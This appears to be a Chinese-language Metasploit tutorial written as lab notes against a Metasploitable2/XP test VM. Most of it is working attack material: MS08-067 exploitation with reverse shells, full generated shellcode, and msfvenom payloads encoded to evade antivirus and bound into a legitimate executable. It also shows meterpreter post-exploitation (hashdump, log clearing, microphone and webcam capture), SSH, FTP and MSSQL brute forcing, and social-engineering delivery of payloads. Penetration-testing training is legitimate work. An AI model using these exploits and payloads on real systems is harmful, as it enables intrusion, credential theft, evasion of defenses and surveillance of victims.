metasploit frame

这是一个渗透测试框架,围绕这个框架,我们就可以完成最终的目标,即渗透测试。

渗透测试者困扰:需要掌握数百个工具,上千条命令参数,很难记住。
新出现的漏洞PoC/EXP有不同的运行环境要求,准备工作繁琐。
大部分时间都在学习不同工具的使用习惯,如果能统一就好了。

MSF默认集成在Kali linux之中,使用postgresql数据库存储数据。

MSF::Core:最底层的库,提供Msf的核心基本API,是框架的核心能力实现库。

MSF::Base:基于Core库,具有便于上层用户实现, 提供友好的API接口,便于模块调用的库。

MSF::UI:面向用户的接口,用户界面,包括了Driver界面,console界面,CLI界面,web界面,GUI界面,和Armitage界面。

Plugin插件:连接和调用外部扩展功能和系统。

如果渗透测试过程当中数据库被打乱,那么此时我们可以使用msfdb进行一些回复删除等操作。

root@kali:~# msfdb                                                                                                                                                         

Manage the metasploit framework database                                                                                                                                  

  msfdb init     # start and initialize the database
msfdb reinit # delete and reinitialize the database
msfdb delete # delete database and stop using it
msfdb start # start the database
msfdb stop # stop the database
msfdb status # check service status
msfdb run # start the database and run msfconsole

这里我们能够查看到具体的msf模块

root@kali:/usr/share/metasploit-framework/modules# ls
auxiliary encoders evasion exploits nops payloads post

技术功能模块:(不是流程模块)

-Exploits:利用系统漏洞进行攻击的动作,此模块对应每一个具体漏洞的攻击方法(主动,被动)

- Payload:成功exploit之后,真正的在目标系统执行的代码或指令。

1. shellcode或系统命令

2. 三种Payload:/usr/share/metasploit-framework/modules/payloads/

3. single:all-in-one一体化,只要有这段代码就能执行shell的全部功能,但体积较大。

4. stager:目标计算机内存有限时,线传输一个较小的payload用于建立连接,体积较小

5. stages:利用stager建立的链接下载的后续payload

6. Stager,Stages都有多种类型,适用于不同场景

7. Shellcode是payload的一种,由于其建立正向/反向shell而得名。
技术功能模块:

- Auxiliary:执行信息搜集,枚举,指纹探测,扫描等功能的辅助模块(没有payload的exploit模块)

- Encoders:对payload进行加密,躲避AV检查的模块。

- Nops:提高payload稳定性及维持大小。

msf基本使用和控制台命令

msfconsole使用界面:点击图标或者终端输入msfconsole

- 最流行用户接口

- 几乎可以使用全部的MSF功能

- 控制台支持TAB自动补齐

- 支持外部命令的执行

- 使用help查看帮助信息

MSF控制台命令

Banner,Color,connect -h

connect命令
msf5 > connect 192.168.214.148 80
[*] Connected to 192.168.214.148:80
get /Metasploitable2 - Linux _ _ _ _ _ _ ____
_ __ ___ ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) |
| | | | | | __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | | __// __/
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|
|_| Warning: Never expose this VM to an untrusted network! Contact: msfdev[at]metasploit.com Login with msfadmin/msfadmin to get started
show

show命令分为

msf5 > show
show all show auxiliary show encoders show exploits show nops show options show payloads show plugins show post

可以帮助我们了解有哪些命令可以使用如何使用。

search

方便我们快速查找一些漏洞或模块:例如search name:mysql/path:scada/platform:aix/type:aux/cve:2011/author:aaron

我们查找一个ms08-067这个漏洞

msf5 > search ms08-067

Matching Modules
================ # Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms08_067_netapi 2008-10-28 great Yes MS08-067 Microsoft Server Service Relative Path Stack Corruption
use

我们使用一个很具体的漏洞模块的时候,我们使用use,例如use exploit/windows/smb/ms08067netapi。

进入一个具体的模块之后:我们可以show options/payloads/targets/advanced/evasion,-info edit,check,back.

msfdb

当我们的数据库模块未被启动起来的时候,我们可以先查看数据库状态,湍口是5432,然后启动数据库,msfdb start 未有效的话再启动service postgresql start然后在查看数据库当前状态。

db_connect //连接数据库       db_disconnect //断开数据库连接    db_export         db_import         db_nmap  //集成在msf的nmap扫描命令         db_rebuild_cache  db_remove         db_save           db_status//db状态 

我们想要进行数据库连接:db_connect -y 数据库路径,后续我们的道德结果都可以被保存在数据库当中。

进行nmap扫描后如果我们只想要看到某一台主机的单个信息我们可以使用hosts参数即hosts

我们只想要看到一些up状态的主机,我们可以加上-u参数,即hosts -u

我们只想要看某一列的信息:hosts -c 列名//我们也可以加上S参数即search。

service -p 端口号 / services -c 列名 -p端口号,当然端口号也可以指定范围。

msf5 > services -c port,state -p 1-100
Services
======== host port state
---- ---- -----
192.168.214.148 21 open
192.168.214.148 22 open
192.168.214.148 23 open
192.168.214.148 25 open
192.168.214.148 53 open
192.168.214.148 80 open

vulns可用的载荷 / creds (mysql_login)显示用户账号密码/loot(hashdump)获取hash值

msf5 auxiliary(scanner/mysql/mysql_login) > creds
Credentials
=========== host origin service public private realm private_type JtR Format
---- ------ ------- ------ ------- ----- ------------ ----------
192.168.214.148 192.168.214.148 3306/tcp (mysql) root Blank password msf5 auxiliary(scanner/mysql/mysql_login) > loot Loot
==== host service type name content info path
---- ------- ---- ---- ------- ---- ---- msf5 auxiliary(scanner/mysql/mysql_login) > vulns Vulnerabilities
=============== Timestamp Host Name References
--------- ---- ---- ----------

默认数据存放位置:/usr/share/metasploit-framework/config/database.yml 数据库的导入与导出:dbexport/dbinport nmap -A 192.168.214.148 -oX nmap.xml,这里的xml文件是可以导入db_import /root/nmap.xml.

set/unset/setg/unsetg/:unset取消set的设置,setg全局变量的设置只要模块里有这个参数那么所设置的值就是这个setg的数。
save:我们可以进行保存,保存好之后有具体的文件保存路径,只要删去那么就
run/exploit:两个命令相差不多,都是执行一个具体模块。

使用ms08067对xp机器进行攻击

search ms08-067

use exploit/windows/smb/ms08067netapi 使用模块

show options:此时可以设置rhost等参数

set rhost 192.168.214.148

set target 34 指定目标系统类型是34,这个我们可以使用show targets进行查看

show payloads 查看可选的payload

set payload windows/shell/reverse_tcp选择payload

show options:此时我们可以看到payloads选项

set lhost 192.168.214.150 :设置反弹shell反弹回本机的ip地址

exploit/run进行执行

Session

session -l /-i(shell,meterpreter session,VNC)

load,unload,loadpath

前两者加入组件,loadpath可以添加我们自己创建的组件。

route

route可以通过指定session路由流量,实现路由,我们渗透进内网获取了一个session,将我们已经控制的机器作为跳板。

route add 10.1.1.0//目标网络 255.255.255.0//子网掩码 4//session号,这样凡是我们向子网发送的流量都通过这个session建立的连接想内网扩散。

resource

我们有的时候觉得一个一个输入命令很麻烦,但我们可以将所有的指令都放入到一个文件中,我们在msf中调用这个文件就自动的实现文件当中的命令。

msfconsole -r r.rc

exploit模块

exploit模块可以分成两个大类,分别为Active exploit 和 passive exploit.通过漏洞利用代码如何被触发来进行分类的。

前者攻击方主动将漏洞利用代码发给服务端侦听端口后者利用了一些客户端程序上的漏洞如浏览器漏洞进行漏洞,在passive漏洞一般我们都需要去诱使用户去访问点击,因为客户端是不提供服务的,一般也就没有端口开放,不想服务端,这样我们就无法使用第一个主动模块进行攻击。

- use exploit/windows/browser/aniloadimagechunksize

- set URIPPATH/

- set PAYLOAD windows/shell/reversetcp

- set LHOST 192.168.1.1

- set LPORT 4444

- exploit

Active explolit

- use exploit/windows/smb/psexec

- set RHOST 192.168.1.100

- set PAYLOAD windlws/shell/reverse
tcp

- set LHOST 192.168.1.1

- set LPORT 4444

- set SMBUSER user1

- set SMBPASS pass1

- exploit

生成payload

有的时候我们的payload在程序中会因为坏字符的存在无法运行成功或者是他的功能发生了变化。

msf5 > use payload/windows/shell/bind_tcp    //使用payload
msf5 payload(windows/shell/bind_tcp) > generate //生成payload
# windows/shell/bind_tcp - 285 bytes (stage 1)
# https://metasploit.com/
# VERBOSE=false, LPORT=4444, RHOST=, PingbackRetries=0,
# PingbackSleep=30, PayloadUUIDTracking=false,
# EnableStageEncoding=false, StageEncoderSaveRegisters=,
# StageEncodingFallback=true, PrependMigrate=false,
# EXITFUNC=process, CreateSession=true
buf =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50" +
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +
"\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7" +
"\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78" +
"\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3" +
"\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01" +
"\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58" +
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3" +
"\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a" +
"\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32" +
"\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff" +
"\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b" +
"\x00\xff\xd5\x6a\x0b\x59\x50\xe2\xfd\x6a\x01\x6a\x02\x68" +
"\xea\x0f\xdf\xe0\xff\xd5\x97\x68\x02\x00\x11\x5c\x89\xe6" +
"\x6a\x10\x56\x57\x68\xc2\xdb\x37\x67\xff\xd5\x57\x68\xb7" +
"\xe9\x38\xff\xff\xd5\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57" +
"\x97\x68\x75\x6e\x4d\x61\xff\xd5\x6a\x00\x6a\x04\x56\x57" +
"\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10" +
"\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53" +
"\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x01\xc3" +
"\x29\xc6\x75\xee\xc3" # windows/shell/bind_tcp - 240 bytes (stage 2)
# https://metasploit.com/
buf =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" +
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +
"\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d" +
"\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0" +
"\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" +
"\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff" +
"\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d" +
"\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" +
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44" +
"\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" +
"\x12\xeb\x86\x5d\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57" +
"\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01" +
"\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46" +
"\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89" +
"\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb" +
"\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c" +
"\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53" +
"\xff\xd5"
msf5 payload(windows/shell/bind_tcp) > generate -b '\x00' //过滤掉坏字符'\x00'可以看到此时我们使用了# Encoder: x86/shikata_ga_nai这个模块
# windows/shell/bind_tcp - 312 bytes (stage 1)
# https://metasploit.com/
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, LPORT=4444, RHOST=, PingbackRetries=0,
# PingbackSleep=30, PayloadUUIDTracking=false,
# EnableStageEncoding=false, StageEncoderSaveRegisters=,
# StageEncodingFallback=true, PrependMigrate=false,
# EXITFUNC=process, CreateSession=true
buf =
"\xdd\xc6\xd9\x74\x24\xf4\x5b\xb8\x22\xfd\x0c\x07\x2b\xc9" +
"\xb1\x48\x83\xc3\x04\x31\x43\x14\x03\x43\x36\x1f\xf9\xfb" +
"\xde\x5d\x02\x04\x1e\x02\x8a\xe1\x2f\x02\xe8\x62\x1f\xb2" +
"\x7a\x26\x93\x39\x2e\xd3\x20\x4f\xe7\xd4\x81\xfa\xd1\xdb" +
"\x12\x56\x21\x7d\x90\xa5\x76\x5d\xa9\x65\x8b\x9c\xee\x98" +
"\x66\xcc\xa7\xd7\xd5\xe1\xcc\xa2\xe5\x8a\x9e\x23\x6e\x6e" +
"\x56\x45\x5f\x21\xed\x1c\x7f\xc3\x22\x15\x36\xdb\x27\x10" +
"\x80\x50\x93\xee\x13\xb1\xea\x0f\xbf\xfc\xc3\xfd\xc1\x39" +
"\xe3\x1d\xb4\x33\x10\xa3\xcf\x87\x6b\x7f\x45\x1c\xcb\xf4" +
"\xfd\xf8\xea\xd9\x98\x8b\xe0\x96\xef\xd4\xe4\x29\x23\x6f" +
"\x10\xa1\xc2\xa0\x91\xf1\xe0\x64\xfa\xa2\x89\x3d\xa6\x05" +
"\xb5\x5e\x09\xf9\x13\x14\xa7\xee\x29\x77\xaf\xc3\x03\x88" +
"\x2f\x4c\x13\xfb\x1d\xd3\x8f\x93\x2d\x9c\x09\x63\x52\xb7" +
"\xee\xfb\xad\x38\x0f\xd5\x69\x6c\x5f\x4d\x58\x0d\x34\x8d" +
"\x65\xd8\xa1\x86\xc0\xb3\xd7\x64\x98\x32\x72\x95\x34\xdf" +
"\x8d\x46\x24\xe0\x47\xef\xcc\x1d\x68\x01\x50\xab\x8e\x4b" +
"\x78\xfd\x19\xe4\xba\xda\x91\x93\xc5\x08\x8a\x33\x8e\x5a" +
"\x0d\x3b\x0f\x49\x39\xab\x9b\x9e\xfd\xca\x9c\x8a\x55\x9a" +
"\x0a\x40\x34\xe9\xab\x55\x1d\x9b\x2b\xc0\x9a\x0a\x7c\x7c" +
"\xa1\x6b\x4a\x23\x5a\x5e\xc1\xea\xce\x21\xbd\x12\x1f\xa2" +
"\x3d\x45\x75\xa2\x55\x31\x2d\xf1\x40\x3e\xf8\x65\xd9\xab" +
"\x03\xdc\x8e\x7c\x6c\xe2\xe9\x4b\x33\x1d\xdc\x4d\x0f\xc8" +
"\x18\x38\x61\xc8" # windows/shell/bind_tcp - 240 bytes (stage 2)
# https://metasploit.com/
buf =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" +
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +
"\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d" +
"\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0" +
"\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" +
"\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff" +
"\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d" +
"\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" +
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44" +
"\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" +
"\x12\xeb\x86\x5d\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57" +
"\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01" +
"\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46" +
"\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89" +
"\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb" +
"\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c" +
"\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53" +
"\xff\xd5"

generate -e x86/nonalpha ,此处-e参数指定了编码器x86/nonalpha

- i 加密几次,跟我们在使用免杀时-i参数的意义是一样的。

- f 输出payload的格式,默认为16进制,我们可以制定其类型为exe等。

-k 运行过程中不会产生新的进程,只会产生新的进程,隐蔽性更高。

-x 在生成payload时使用一个正常程序作为模板,将他们两个绑定到一起,同事正常的程序也能执行
-o 输出文件路径名字

generate -b '\x00' -e x86/shikataganai -i 5 -k -x /usr/share/windows-binaries/radmin.exe

msf5 payload(windows/shell/bind_tcp) > generate -b '\x00\xff' -e x86/shikata_ga_nai -i 5 -k -x /usr/share/windows-binaries/radmin.exe -f exe -o /root/1.exe
[*] Writing 1319936 bytes to /root/1.exe...
Meterpreter
  • 高级,动态,可拓展的payload
  • 基于meterpreter上下文利用更多漏洞发起攻击
  • 后渗透测试阶段一站式操作界面

    完全基于内存的DLL注入式payload(不写硬盘)
  • 注入合法系统进程并建立stager
  • 基于Stager上传和预加载DLL进行扩展模块的注入
  • 利用stager建立的socket连接建立加密的TSL/1.0通信隧道
  • 利用TSL隧道进一步加载后续扩展模块
meterpreter基本命令

我们继续利用meterpreter类型的shell,使用ms08-067这个模块。

此时我们就进入了meterpreter的shell,这里有大量的命令。

help:查看当前shell下的命令

background:回到之前的界面,也就是从meterpreter返回到msf。

pwd:进入到当前window系统上的工作目录

dir,ls:都可以先输出当前稳健的目录以及其操作权限。

cat:查看文档,例如我们可以cat boot.ini这个是引导目录如果我们删除了那么就无法开机了。

mkdir:创建一个目录

mv,rm:改名,删除。

edit:编辑文件,类似于我们在linux的vi

lpwd:查看当前所在目录(本机的 )

lcd:进入当当前linux的目录,我们想要上传某个文件的时候,我们使用lcd切换脑本机的那个目录。

run,bgrun:运行程序命令,前者是在前台进行,后者在后台进行,我们可以运行很多进程,bgrun + 两下 TAB键进行补全查看所有可以运行模块。

clearev:清除目标系统的日志,用来清理战场的。

download:下载指令,从目标系统下载文件。

upload:上传指令

execute -f cmd.exe

get uid:查看当前用户权限

getsystem:将自己权限提升为system。

getproxy:获取到目标主机的代理信息。

ps:查看进程

migrete:进程迁移

getpid:查看当前进程pid

hashdump:获取到hashdump

sysinfo:查看系统一些信息

kill:删除进程

netstat:查看网络连接状态

idletime:目标操作系统空闲时间。

resource:

recordmic:记录麦克风声音

webcam
list:列出当前电脑上所有连接的摄像头。

Meterpreter python扩展

无需运行环境,在客户端运行原生的python代码。

msfcli

2015年已经被取消。由msfconsole -x代替,编写脚本的时候便于引用,例如下面这一串代码

msfconsole -x "use exploir/windows/smb/ms08-067netapi;set RHOST 1.1.1.1;set PAYLOAD windows/meterpreter/reversetcp;set LJOST 1.1.1.8;set LPORT 4444;set target 34 ;exploit"

msf信息发现与端口扫描

我们扫描主要由auxiliary进行完成,因为他不会向目标发送payload。

nmap扫描:dbnmap -sV1 192.168.214.148

Auxiliary扫描模块:

此时我们同模块一样,可以使用RHOSTS来进行表示目标主机,支持2多主机段扫描: 192.168.1.20-192.168.1.30 或 192.168.1.0/24,192.168.11.0/24

msf当中穿在arp的扫描模块:use auxiliary/scanner/discovery/arp
sweep

端口扫描:search portscan:use auxiliary/scanner/portscan/syn

UDP扫描:use auxiliary/scanner/discover/udpsweep;use auxiliary/scanner/discover/udpprobe

Nmap IPID idle扫描:查找ipidseq主机:use auxiliary/scanner/ip/ipidseq或nmap -PN -sl 1.1.1.2 1.1.1.3//前者僵尸机后者是目标。

密码嗅探
  • use auxiliary/sniffer/psnuffle
  • 直接run那么就是实时抓包模式,嗅探到密码

    此时我们对靶机的21端口进行扫描发现开放,进行连接
root@kali:~# nmap -p21 192.168.214.148
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-28 14:06 CST
Nmap scan report for 192.168.214.148
Host is up (0.00042s latency). PORT STATE SERVICE
21/tcp open ftp
MAC Address: 00:0C:29:29:2C:AE (VMware) Nmap done: 1 IP address (1 host up) scanned in 0.16 seconds
root@kali:~# ftp 192.168.214.148
Connected to 192.168.214.148.
220 (vsFTPd 2.3.4)
Name (192.168.214.148:root): user1
331 Please specify the password.
Password:
530 Login incorrect.
Login failed.

这个时候我们在看到msf,可以看到账户密码了

msf5 auxiliary(sniffer/psnuffle) > [*] Loaded protocol POP3 from /usr/share/metasploit-framework/data/exploits/psnuffle/pop3.rb...
[*] Loaded protocol SMB from /usr/share/metasploit-framework/data/exploits/psnuffle/smb.rb...
[*] Loaded protocol URL from /usr/share/metasploit-framework/data/exploits/psnuffle/url.rb...
[*] Sniffing traffic.....
[!] *** auxiliary/sniffer/psnuffle is still calling the deprecated report_auth_info method! This needs to be updated!
[!] *** For detailed information about LoginScanners and the Credentials objects see:
[!] https://github.com/rapid7/metasploit-framework/wiki/Creating-Metasploit-Framework-LoginScanners
[!] https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-HTTP-LoginScanner-Module
[!] *** For examples of modules converted to just report credentials without report_auth_info, see:
[!] https://github.com/rapid7/metasploit-framework/pull/5376
[!] https://github.com/rapid7/metasploit-framework/pull/5377
[*] Failed FTP Login: 192.168.214.150:52060-192.168.214.148:21 >> user1 / 333

如果我们已经有抓包好的文件,我们使用pcapfile进行分析

set PCAPFILE /root/ftp.pcap

snmp扫描

msf5 auxiliary(sniffer/psnuffle) > use auxiliary/scanner/snmp/snmplogin暴力破解

msf5 > use auxiliary/scanner/snmp/snmp
enum枚举线程

msf5 > use auxiliary/scanner/snmp/snmp_——enumusers

SMB服务扫描

SMB版本扫描:msf5 auxiliary(scanner/snmp/snmp_enum) > use auxiliary/scanner/smb/smb

msf5 auxiliary(scanner/smb/smb_version) > run

[*] 192.168.214.148:445   - Host could not be identified: Unix (Samba 3.0.20-Debian)
[*] 192.168.214.148:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

扫描命名管道,判断SMB服务类型:获取到命令管道

msf5 auxiliary(scanner/smb/pipe_auditor) > set rhosts 192.168.214.148
rhosts => 192.168.214.148
msf5 auxiliary(scanner/smb/pipe_auditor) > run [+] 192.168.214.148:139 - Pipes: \netlogon, \lsarpc, \samr, \eventlog, \lsass, \ntsvcs, \srvsvc, \wkssvc
[*] 192.168.214.148: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

SMB共享枚举(账号密码):msf5 auxiliary(scanner/smb/pipeauditor) > use auxiliary/scanner/smb/smbenumshares

用户枚举:use auxiliary/scanner/smb/smbenumusers

SID枚举:use auxiliary/scanner/smb/smb
lookupsid

ssh

版本扫描:msf5 > use auxiliary/scanner/ssh/sshversion

公钥登录:use auxiliaryscanner/ssh/ssh
loginpubkey

set keyfile idrsa;set username root ;run

暴力破解:msf5 auxiliary(scanner/ssh/ssh
version) > use auxiliary/scanner/ssh/sshlogin;set rhosts 192.168.214.148;set USERPASSFILE /root/3.txt;set verbose true

msf5 auxiliary(scanner/ssh/ssh_login) > show options 

Module options (auxiliary/scanner/ssh/ssh_login):

   Name              Current Setting  Required  Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS 192.168.214.148 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
RPORT 22 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME no A specific username to authenticate as
USERPASS_FILE /root/3.txt no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts msf5 auxiliary(scanner/ssh/ssh_login) > run [-] 192.168.214.148:22 - Failed: 'root:root'
[-] 192.168.214.148:22 - Failed: 'root:2233'
[+] 192.168.214.148:22 - Success: 'msfadmin:msfadmin' ''
[*] Command shell session 1 opened (192.168.214.150:40163 -> 192.168.214.148:22) at 2020-02-28 16:40:36 +0800
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

于此我们已经成功登陆了。

系统补丁

windows缺少的补丁 - 基于已经获得的session进行检测 - use post/windows/gather/enum_patches

msf mysql扫描端口,查看数据库的tcp端口
  • TCP 1433(动态端口)/UDP 14343 (查询TCP端口号)
  • use auxiliary/scanner/mssqk/mssql_ping
  • 通过这个模块我们可以获得mssql服务的tcp端口
爆破mssql密码

-use auxiliary/scanner/mssqk/mssql_login - 设置主机,用户,以及密码文件

远程登录

set RHOST / set PASSWORD / set RPORT 此时我们连接上这个数据库我们可以执行操作系统命令或cmd命令 远程执行代码:use auxiliary/admin/mssql/mssql_exec set CMD net user user pass /ADDS

FTP版本扫描

use auxiliary/scanner/ftp/ftpversion //探测版本 use auxiliary/scanner/ftp/anonymous //是否支持匿名登录 use auxiliary/scanner/ftp/ftplogin use auxiliary/scanner/[tab] - display all 479 possibilities

弱点扫描
  • 根据搜集结果搜索漏洞利用模块
  • 结合外部漏洞扫描系统对大IP地址段进行批量扫描
  • 误判率,错判率
vnc密码破解

use auxiliary/scanner/vnc/vnc_login

msf5 auxiliary(scanner/ftp/ftp_login) > run

[*] 192.168.214.148:21    - 192.168.214.148:21 - Starting FTP login sweep
[-] 192.168.214.148:21 - 192.168.214.148:21 - LOGIN FAILED: root:root (Incorrect: )
[-] 192.168.214.148:21 - 192.168.214.148:21 - LOGIN FAILED: root:2233 (Incorrect: )
[+] 192.168.214.148:21 - 192.168.214.148:21 - Login Successful: msfadmin:msfadmin
[*] 192.168.214.148:21 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

RDP远程桌面漏洞 use auxiliary/scanner/rdp/ms12020check 检查不会造成DoS攻击

设备后门

use auxiliary/scanner/ssh/juniperbackdoor use auxiliary/scanner/ssh/fortinetbackdoor 暴力破解得到密码可以利用web appi远程开启 use auxiliary/admin/vmware/poweron_vm//我们拿到相应密码漏洞,我们可以对服务进行各种操作(admin模块)

HTTP扫描

证书是否过期: use auxiliary/scanner/http/cert 显示目录及文件: use auxiliary/scanner/http/filesdir;use auxiliary/scanner/http/filesdir TOMCAT管理登录:use auxiliary/scanner/http/tomcatmgrlogin 基于HTTP方法的身份验证绕过:use auxiliary/scanner/http/verbauthbypass WEBDAV Unicode编码身份验证绕过:use auxiliary/scanner/http/dirwebdavunicode_bypass wordpress密码爆破:use auxiliary/scanner/http/wordpressloginenum;set URL/wordpress/wp-login.php

msf5 auxiliary(scanner/http/dir_listing) > show options 

Module options (auxiliary/scanner/http/dir_listing):

   Name     Current Setting  Required  Description
---- --------------- -------- -----------
PATH dav yes The path to identify directory listing
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.214.148 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
THREADS 1 yes The number of concurrent threads (max one per host)
VHOST no HTTP server virtual host msf5 auxiliary(scanner/http/dir_listing) > run [+] Found Directory Listing http://192.168.214.148:80/dav/
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

WMAP WEB应用扫描器 - 根据sqlmap工作方式开发 - load wmap - wmapsites -a http://1.1.1.1 - wmaptargets -t http://1.1.1.1/mutillidae/index.php - weaprun -t - wmaprun -e

弱点扫描

openvas:load openvas此处为命令行格式;导入nbe格式扫描日志;dbimport openvas.nbe nessus: msf5 > load nessus msf5 > nessushelp msf5 > nessus_connect nessus:nessus@127.0.0.1//进行连接 查看已有策略

msf5 > nessus_policy_list
Policy ID Name Policy UUID
--------- ---- -----------
7 linux_vuln_scan ad629e16-03b6-8c1d-cef6-ef8c9dd3c658d24bd260ef5f9e66

创建扫描任务msf5 > nessusscannew ad629e16-03b6-8c1d-cef6-ef8c9dd3c658d24bd260ef5f9e66 scan1 scan1 192.168.214.148 执行扫描任务:nessusscanlaunch scan-id 查看报告:nessusreportlist

MSF客户端渗透

在无法突破网络便捷饿的情况下转而攻击客户端 - 社会工程学攻击 - 进而渗透线上业务网络 - 含有漏洞代码的web站点 - - 利用客户端漏洞 含有漏洞利用代码的DOC,PDF等文档 诱骗被害者执行payload:

1. root@kali:/etc/init.d# msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.168.214.150 LPORT=4444 -b '\x00' -e x86/shikata_ga_nai -i 9 -f exe -o 2.exe
Found 1 compatible encoders
Attempting to encode payload with 9 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 368 (iteration=0)
x86/shikata_ga_nai succeeded with size 395 (iteration=1)
x86/shikata_ga_nai succeeded with size 422 (iteration=2)
x86/shikata_ga_nai succeeded with size 449 (iteration=3)
x86/shikata_ga_nai succeeded with size 476 (iteration=4)
x86/shikata_ga_nai succeeded with size 503 (iteration=5)
x86/shikata_ga_nai succeeded with size 530 (iteration=6)
x86/shikata_ga_nai succeeded with size 557 (iteration=7)
x86/shikata_ga_nai succeeded with size 584 (iteration=8)
x86/shikata_ga_nai chosen with final size 584
